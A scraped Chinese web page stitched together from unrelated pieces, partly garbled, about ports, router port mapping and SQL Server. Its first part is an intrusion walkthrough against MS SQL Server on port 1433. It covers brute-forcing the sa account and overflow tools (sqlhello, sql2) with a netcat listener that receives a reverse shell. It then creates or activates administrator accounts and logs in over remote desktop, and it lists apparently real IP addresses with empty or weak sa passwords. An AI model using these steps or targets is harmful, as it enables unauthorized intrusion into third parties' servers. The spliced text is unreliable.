试看
序->MicsoftSQLSERVER->服务器实用管理工具->启用的协议->TCP/IP->属性
将端口改回1433
查看一下端口1433是否有,有改端口或把哪个占用这个端口的程序关闭~!scanportexe 查有1433的机器
SQLScanPassexe 进行字典暴破(字典是关键)
最后 SQLToolsexe入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloFexe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhellozexe 入侵ip 1433 (这个是正向连接)
久违的溢出工具
用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。
通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?
先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218147 61157 0”,其中218147是对方IP,61157是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。
我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的 *** 作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。
首先运行Windows XP自带远程登录器mstscexe,填入对方的IP地址218147,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。
218513566 SQL-Server弱口令: "sa/1234"
21814115111 SQL-Server弱口令: "sa/[空口令]"
218123852 SQL-Server弱口令: "sa/[空口令]"
218129714 SQL-Server弱口令: "sa/[空口令]"
2186242228 SQL-Server弱口令: "sa/[空口令]"
2221001193 SQL-Server弱口令: "sa/[空口令]"
22210567200 SQL-Server弱口令: "sa/[空口令]"
22210528130 SQL-Server弱口令: "sa/[空口令]"
2221066051 SQL-Server弱口令: "sa/[空口令]"
2221171071 SQL-Server弱口令: "sa/[空口令]"
在win2000机器上装了mssql的话,机器就会开1433端口。什么 什么是端口?就象食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433端口。溢出1433需要两个工具ncexe和sql2exe。进攻方法就两步,在自己机器上开一个cmd窗口。对了,你要用win2000的话就在开始-运行-键入cmd回车就成了饿。这里我们只用2000不说98。如果你把你的下的ncexe和sql2exe放在C:盘的话,就在你开的这个窗口打入命令c:>nc -1 -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-键入cmd灰尘,再开个窗口。在这个窗口写入命令c:>sql2exe你要入侵网站的ip和你自己的ip 40 0回车。这里要作点说明:如何得到入侵网站的ip?在cmd下c:>ping 网址,就行了。自己的ip就不用我说了吧?算了还是说下吧,在cmd下键入ipconfig就可以了。其中命令行中的40你可以随便改成别的,但好象40和53的成功率高一点。再是命令中的0不性的话,你就试试1或2。如果入侵网站有这个漏洞的话,那么你开的第一个窗口就会边成肉鸡的c:>winnt\system32>就是说,你已经进入它的机器里了。进去以后,你可以添加个拥护了。net user guest /active:yes用这个命令,就将默认禁止的guest拥护激火。net user guest 123456这样guest的密码变成了123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。
呵呵,基本就是这样了,,,,一、首先检查内网服务是否正常:
在内网通过服务器的内网IP地址,测试是否可以访问对应的服务。若是内网都无法正常访问,建议您排查内网原因,如:该主机配置是否正确,内网客户机是否可以正常Ping通该主机,务必确保提供服务主机可以正常连接互联网。
二、检查外网地址是否有限制:
不经过路由器,将服务器直接连接外网线路上网,测试外网是否可以访问。如果无法访问,可能网络运营商封锁了需要映射的端口,外网无法访问映射的端口,请向运营商咨询了解。
三、确认网吧路由器设置是否正常:
1首先,请检查端口映射的配置是否正确。端口映射具体配置请参看《网吧路由映射的具体 *** 作步骤》 ,确认配置正确后,可以在基础设置-基本选项中,打开端口回流,在内网通过外网IP地址(外网IP地址在系统状态→网络接口中查询),测试映射端口是否可以访问。
2网络安全→攻击防御→外网防御→禁止外部开放端口保护→禁止阻断外网请求→保存
3请在系统工具》管理选项里面查看确认路由器的端口是否与映射端口冲突
4如果外网为双线接入,请检查访问的外网IP地址是否和相应的映射线路对应。或者用户是否做了源地址路由把此服务器调至另一条线路而与映射线路不在一条线路。
5如果外网为单线接入,请检查是否作了NAT一对一把相应外网接口IP地址占用,造成端口映射不成功。
四、其他 :
1保证以上步骤无误如还不成功,请尝试把服务器上的杀毒软件以及防火墙关闭。
2如果外网检查指定端口已映射成功,但仍不能访问,请尝试使用NAT一对一功能映射服务器上的所有端口,确认是否还有其它端口需要映射。你用的什么软件打不开,下载的软件吗?
现在网吧管的紧,正规的网吧都有绿色保护程序,把一些常用的涉及色情、暴力、恐怖等违法的软件、网站、词汇搜索引擎都给屏蔽了,凡是程序搜索到你想使用这些东西的软件,就给你把进程杀死。
这和端口没有关系,不同的软件走不同的端口,你觉得这网吧的网管有那么强大吗?连你要用什么端口,都能事先猜到并关掉,那真是太神奇了!
想解决你这个问题,有两种方法:1、从网上找取代你要用的这个软件功能的软件。2、找公安局去,这个软件是公安局指定安装的。端口就是你电脑上某个ip对外开放的一个“门”,逻辑概念。
ip和端口一般同时出现来制定某一个网络设备上的一个被监听着的软件。
一般一个进程占用一个或者多个端口来完成网络传输。
ip和端口合称为网络节点。
找和查询:
你自己电脑的ip直接在cmd下输入ipconfig就可以看到完整的信息。
这个ip可能是DHCP服务器分配给你的,也可以是自己设置的。
设置在网络连接里,每个连接都有右键属性,tcp/ip设置里就可以设置它的ip。
至于找端口,你可以使用类似icesword的软件查看每个端口被软件占用的情况。低端口(0-255)是系统占用的。
如果你要找别人的ip和端口,那就是使用爆破法对每个ip的每个端口进行侦测,侦测方法很多种,你可以使用x之类的黑客软件来侦测。Windows客户端的做法是:
开始--所有程序--管理工具--服务--(或直接在运行中输入serviceexe)找到telnet并双击,在登陆选项卡中选本地系统帐户,在常规选项卡中的启动类型,选“手动”再点击下面的启动即可
在桌面上网上邻居属性本地连接 属性 TCP/IP 属性高级选项 属性 将所有的 端口 都选中;
在路由器上的 *** 作是:
1、sys或conf t 进入编辑模式;
2、填写你要开放端口号的IP,补上掩码,如:19216812010 255255255255 443
上面这个例子就是典型的开放19216812010这个IP的443端口(也就是>
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)